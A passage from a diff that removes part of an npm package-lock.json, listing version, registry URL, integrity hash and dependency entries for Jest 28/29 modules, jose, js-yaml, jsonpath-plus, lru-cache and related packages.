"sha512-ioj2w9/DxSYHfOm5lJKCdcAmPJzQXmbM/Url3rhlghrPvT3tt+7a/+oXc9azkKmLvoiXjtV83bEWqi+vs5nlPA==", - "dev": true, - "optional": true, - "peer": true, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-haste-map": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-28.1.3.tgz", - "integrity": "sha512-3S+RQWDXccXDKSWnkHa/dPwt+2qwA8CJzR61w3FoYCvoo3Pn8tvGcysmMF0Bj0EX5RYvAI2EIvC57OmotfdtKA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/types": "^28.1.3", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^28.0.2", - "jest-util": "^28.1.3", - "jest-worker": "^28.1.3", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-leak-detector": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-28.1.3.tgz", - "integrity": "sha512-WFVJhnQsiKtDEo5lG2mM0v40QWnBM+zMdHHyJs8AWZ7J0QZJS59MsyKeJHWhpBZBH32S48FOVvGyOFT1h0DlqA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "jest-get-type": "^28.0.2", - "pretty-format": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-matcher-utils": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-28.1.3.tgz", - "integrity": "sha512-kQeJ7qHemKfbzKoGjHHrRKH6atgxMk8Enkk2iPQ3XwO6oE/KYD8lMYOziCkeSB9G4adPM4nR1DE8Tf5JeWH6Bw==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "chalk": "^4.0.0", - "jest-diff": "^28.1.3", - "jest-get-type": "^28.0.2", - "pretty-format": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-message-util": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-28.1.3.tgz", - "integrity": "sha512-PFdn9Iewbt575zKPf1286Ht9EPoJmYT7P0kY+RibeYZ2XtOr53pDLEFoTWXbd1h4JiGiWpTBC84fc8xMXQMb7g==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^28.1.3", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^28.1.3", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-mock": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-28.1.3.tgz", - "integrity": "sha512-o3J2jr6dMMWYVH4Lh/NKmDXdosrsJgi4AviS8oXLujcjpCMBb1FMsblDnOXKZKfSiHLxYub1eS0IHuRXsio9eA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/types": "^28.1.3", - "@types/node": "*" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-regex-util": { - "version": "28.0.2", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-28.0.2.tgz", - "integrity": "sha512-4s0IgyNIy0y9FK+cjoVYoxamT7Zeo7MhzqRGx7YDYmaQn1wucY9rotiGkBzzcMXTtjrCAP/f7f+E0F7+fxPNdw==", - "dev": true, - "optional": true, - "peer": true, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-resolve": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-28.1.3.tgz", - "integrity": "sha512-Z1W3tTjE6QaNI90qo/BJpfnvpxtaFTFw5CDgwpyE/Kz8U/06N1Hjf4ia9quUhCh39qIGWF1ZuxFiBiJQwSEYKQ==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^28.1.3", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^28.1.3", - "jest-validate": "^28.1.3", - "resolve": "^1.20.0", - "resolve.exports": "^1.1.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-runner": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-28.1.3.tgz", - "integrity": "sha512-GkMw4D/0USd62OVO0oEgjn23TM+YJa2U2Wu5zz9xsQB1MxWKDOlrnykPxnMsN0tnJllfLPinHTka61u0QhaxBA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/console": "^28.1.3", - "@jest/environment": "^28.1.3", - "@jest/test-result": "^28.1.3", - "@jest/transform": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.10.2", - "graceful-fs": "^4.2.9", - "jest-docblock": "^28.1.1", - "jest-environment-node": "^28.1.3", - "jest-haste-map": "^28.1.3", - "jest-leak-detector": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-resolve": "^28.1.3", - "jest-runtime": "^28.1.3", - "jest-util": "^28.1.3", - "jest-watcher": "^28.1.3", - "jest-worker": "^28.1.3", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-runtime": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-28.1.3.tgz", - "integrity": "sha512-NU+881ScBQQLc1JHG5eJGU7Ui3kLKrmwCPPtYsJtBykixrM2OhVQlpMmFWJjMyDfdkGgBMNjXCGB/ebzsgNGQw==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/environment": "^28.1.3", - "@jest/fake-timers": "^28.1.3", - "@jest/globals": "^28.1.3", - "@jest/source-map": "^28.1.2", - "@jest/test-result": "^28.1.3", - "@jest/transform": "^28.1.3", - "@jest/types": "^28.1.3", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "execa": "^5.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-mock": "^28.1.3", - "jest-regex-util": "^28.0.2", - "jest-resolve": "^28.1.3", - "jest-snapshot": "^28.1.3", - "jest-util": "^28.1.3", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-snapshot": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-28.1.3.tgz", - "integrity": "sha512-4lzMgtiNlc3DU/8lZfmqxN3AYD6GGLbl+72rdBpXvcV+whX7mDrREzkPdp2RnmfIiWBg1YbuFSkXduF2JcafJg==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/traverse": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^28.1.3", - "@jest/transform": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/babel__traverse": "^7.0.6", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^28.1.3", - "graceful-fs": "^4.2.9", - "jest-diff": "^28.1.3", - "jest-get-type": "^28.0.2", - "jest-haste-map": "^28.1.3", - "jest-matcher-utils": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-util": "^28.1.3", - "natural-compare": "^1.4.0", - "pretty-format": "^28.1.3", - "semver": "^7.3.5" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-util": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-28.1.3.tgz", - "integrity": "sha512-XdqfpHwpcSRko/C35uLYFM2emRAltIIKZiJ9eAmhjsj0CqZMa0p1ib0R5fWIqGhn1a103DebTbpqIaP1qCQ6tQ==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/types": "^28.1.3", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-validate": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-28.1.3.tgz", - "integrity": "sha512-SZbOGBWEsaTxBGCOpsRWlXlvNkvTkY0XxRfh7zYmvd8uL5Qzyg0CHAXiXKROflh801quA6+/DsT4ODDthOC/OA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/types": "^28.1.3", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^28.0.2", - "leven": "^3.1.0", - "pretty-format": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-watcher": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-28.1.3.tgz", - "integrity": "sha512-t4qcqj9hze+jviFPUN3YAtAEeFnr/azITXQEMARf5cMwKY2SMBRnCQTXLixTl20OR6mLh9KLMrgVJgJISym+1g==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/test-result": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.10.2", - "jest-util": "^28.1.3", - "string-length": "^4.0.1" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-worker": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-28.1.3.tgz", - "integrity": "sha512-CqRA220YV/6jCo8VWvAt1KKx6eek1VIHMPeLEbpcfSfkEeWyBNppynM/o6q+Wmw+sOhos2ml34wZbSX3G13//g==", - "dev": true, - "dependencies": { - "@types/node": "*", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/pretty-format": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-28.1.3.tgz", - "integrity": "sha512-8gFb/To0OmxHR9+ZTb14Df2vNxdGCX8g1xWGUTqUw5TiZvcQf5sHKObd5UcPyLLyowNwDAMTF3XWOG1B6mxl1Q==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/schemas": "^28.1.3", - "ansi-regex": "^5.0.1", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/resolve.exports": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-1.1.1.tgz", - "integrity": "sha512-/NtpHNDN7jWhAaQ9BvBUYZ6YTXsRBgfqWFWP7BZBaoMJO/I3G5OFzvTuWNlZC3aPjins1F+TNrLKsGbH4rfsRQ==", - "dev": true, - "optional": true, - "peer": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-runner-eslint/node_modules/semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true, - "optional": true, - "peer": true, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-runner-eslint/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/jest-runtime": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.7.0.tgz", - "integrity": "sha512-gUnLjgwdGqW7B4LvOIkbKs9WGbn+QLqRQQ9juC6HndeDiezIwhDP+mhMwHWCEcfQ5RUXa6OPnFF8BJh5xegwwQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/globals": "^29.7.0", - "@jest/source-map": "^29.6.3", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.7.0.tgz", - "integrity": "sha512-Rm0BMWtxBcioHr1/OX5YCP8Uov4riHvKPknOGs804Zg9JGZgmIBkbtlxJC/7Z4msKYVbIJtfU+tKb8xlYNfdkw==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "natural-compare": "^1.4.0", - "pretty-format": "^29.7.0", - "semver": "^7.5.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.7.0.tgz", - "integrity": "sha512-z6EbKajIpqGKU56y5KBUgy1dt1ihhQJgWzUlZHArA/+X2ad7Cb5iF+AK1EWVL/Bo7Rz9uurpqw6SiBCefUbCGA==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.7.0.tgz", - "integrity": "sha512-ZB7wHqaRGVw/9hST/OuFUReG7M8vKeq0/J2egIGLdvjHCmYqGARhzXmtgi+gVeZ5uXFF219aOc3Ls2yLg27tkw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "leven": "^3.1.0", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate/node_modules/camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-watcher": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.7.0.tgz", - "integrity": "sha512-49Fg7WXkU3Vl2h6LbLtMQ/HyB6rXSIX7SqvBLQmssRBGN9I0PNvPmAmCWSOY6SOvrjhI/F7/bGAv9RtnsPA03g==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.7.0", - "string-length": "^4.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.7.0.tgz", - "integrity": "sha512-eIz2msL/EzL9UFTFFx7jBTkeZfku0yUAyZZZmJ93H2TYEiroIx2PQjEXcwYtYl8zXCxb+PAmA2hLIt/6ZEkPHw==", - "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.7.0", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/jose": { - "version": "5.9.6", - "resolved": "https://registry.npmjs.org/jose/-/jose-5.9.6.tgz", - "integrity": "sha512-AMlnetc9+CV9asI19zHmrgS/WYsWUwCn2R7RzlbJWD7F9eWYUTGyBmU9o6PxngtLGOiDGPRu+Uc4fhKzbpteZQ==", - "optional": true, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "node_modules/js-yaml": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", - "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", - "dependencies": { - "argparse": "^2.0.1" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" - } - }, - "node_modules/jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" - }, - "node_modules/jsep": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", - "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==", - "engines": { - "node": ">= 10.16.0" - } - }, - "node_modules/jsesc": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-3.0.2.tgz", - "integrity": "sha512-xKqzzWXDttJuOcawBt4KnKHHIf5oQ/Cxax+0PWFG+DFDgHNAdi+TXECADI+RYiFUMmx8792xsMbbgXj4CwnP4g==", - "dev": true, - "bin": { - "jsesc": "bin/jsesc" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "node_modules/json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" - }, - "node_modules/json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" - }, - "node_modules/json-stable-stringify-without-jsonify": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/json-stable-stringify-without-jsonify/-/json-stable-stringify-without-jsonify-1.0.1.tgz", - "integrity": "sha512-Bdboy+l7tA3OGW6FjyFHWkP5LuByj1Tk33Ljyq0axyzdk9//JSi2u3fP1QSmd1KNwq6VOKYGlAu87CisVir6Pw==", - "dev": true, - "peer": true - }, - "node_modules/json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" - }, - "node_modules/json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true, - "bin": { - "json5": "lib/cli.js" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/jsonpath-plus": { - "version": "10.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.2.0.tgz", - "integrity": "sha512-T9V+8iNYKFL2n2rF+w02LBOT2JjDnTjioaNFrxRy0Bv1y/hNsqR/EBK7Ojy2ythRHwmz2cRIls+9JitQGZC/sw==", - "dependencies": { - "@jsep-plugin/assignment": "^1.3.0", - "@jsep-plugin/regex": "^1.0.4", - "jsep": "^1.4.0" - }, - "bin": { - "jsonpath": "bin/jsonpath-cli.js", - "jsonpath-plus": "bin/jsonpath-cli.js" - }, - "engines": { - "node": ">=18.0.0" - } - }, - "node_modules/jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "dependencies": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - }, - "engines": { - "node": ">=0.6.0" - } - }, - "node_modules/kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/levn": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/levn/-/levn-0.4.1.tgz", - "integrity": "sha512-+bT2uH4E5LGE7h/n3evcS/sQlJXCpIp6ym8OWJ5eV6+67Dsql/LaaT7qJBAt2rzfoa/5QBGBhxDix1dMt2kQKQ==", - "dev": true, - "peer": true, - "dependencies": { - "prelude-ls": "^1.2.1", - "type-check": "~0.4.0" - }, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "node_modules/locate-path": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-6.0.0.tgz", - "integrity": "sha512-iPZK6eYjbxRu3uB4/WZ3EsEIMJFMqAoopl3R+zuq0UjcAm/MO6KCweDgPfP3elTztoKP3KtnVHxTn2NHBSDVUw==", - "dev": true, - "peer": true, - "dependencies": { - "p-locate": "^5.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/lodash.merge": { - "version": "4.6.2", - "resolved": "https://registry.npmjs.org/lodash.merge/-/lodash.merge-4.6.2.tgz", - "integrity": "sha512-0KpjqXRVvrYyCsX1swR/XTK0va6VQkQM6MNo7PqW77ByjAhoARA8EfrP1N4+KlKj8YS0ZUCtRT/YUuhyYDujIQ==", - "dev": true, - "peer": true - }, - "node_modules/lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "dependencies": { - "yallist": "^3.0.2" - } - }, - "node_modules/make-dir": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-4.0.0.tgz", - "integrity": "sha512-hXdUTZYIVOt1Ex//jAQi+wTZZpUpwBj/0QsOzqegb3rGMMeJiSEu5xLHnYfBrRV4RH2+OCSOO95Is/7x1WJ4bw==", - "dev": true, - "dependencies": { - "semver": "^7.5.3" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/make-dir/node_modules/semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "dependencies": { - "tmpl": "1.0.5" - } - }, - "node_modules/merge-stream": { - "version": "2.0.0", - 